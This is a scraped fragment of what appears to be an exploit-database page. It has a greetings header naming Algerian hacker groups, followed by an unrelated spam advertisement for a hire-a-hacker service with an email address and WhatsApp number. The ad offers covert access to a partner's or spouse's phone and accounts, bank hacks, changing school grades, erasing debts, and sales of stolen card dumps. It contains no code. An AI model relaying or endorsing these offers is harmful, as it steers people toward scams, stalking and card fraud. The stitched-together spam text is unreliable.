# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
# ... And All Algerian Hax0rs
============================================================================================
# 1337day.com [2012-12-12]
I strongly recommend the service of a GREAT Hacker to you and his email is
(wizardcyprushacker@gmail.com) whatsapp +1 (424) 209-7204 I have used him quite a number of times and he has never disappointed me.
He does all types of mobile hacks, get unrestricted and unnoticeable access to your Partner/Spouse, Skype, Facebook Account, Email(s), Whatsapp, Instagram, Text messages, In coming and Out going calls, Twitter, Snap Chats, Bank accounts, Deleted files etc. He can also help you boost your credit score limit and also clear all debts on your card(s).Bitcoins hack and recovery of lost funds
Getting the job done is as simple as sending an email to (wizardcyprushacker@gmail.com) whatsapp +1 (424) 209-7204 stating what you want to do.and is services is cheap and affordables.
CONTACT:(wizardcyprushacker@gmail.com) We are best when it comes to hacking our services include: 1. School Grades Change 2. Drivers License 3. Hack email 4.
Database hack 5. Facebook, Whatsapp 6. Hack Call Logs, 7. Retrieve messages, deleted data and recovery of messages, bitcoins hack and recovery lost funds
on cell phone 8. Crediting , Money Transfer and other various activies 9. Sales of Dumps, Dead drops and fresh CC We
also sell high grades techs and hacking chips and gadgets if you are interested in Spying on anyone. We sell software,
apps for hacking service. Your security is 100% guarantee and we have testimonies all around the world.We get your job done without any disappointment.
Interested parties can reach us at (wizardcyprushacker@gmail.com) whatsapp +1 (424) 209-7204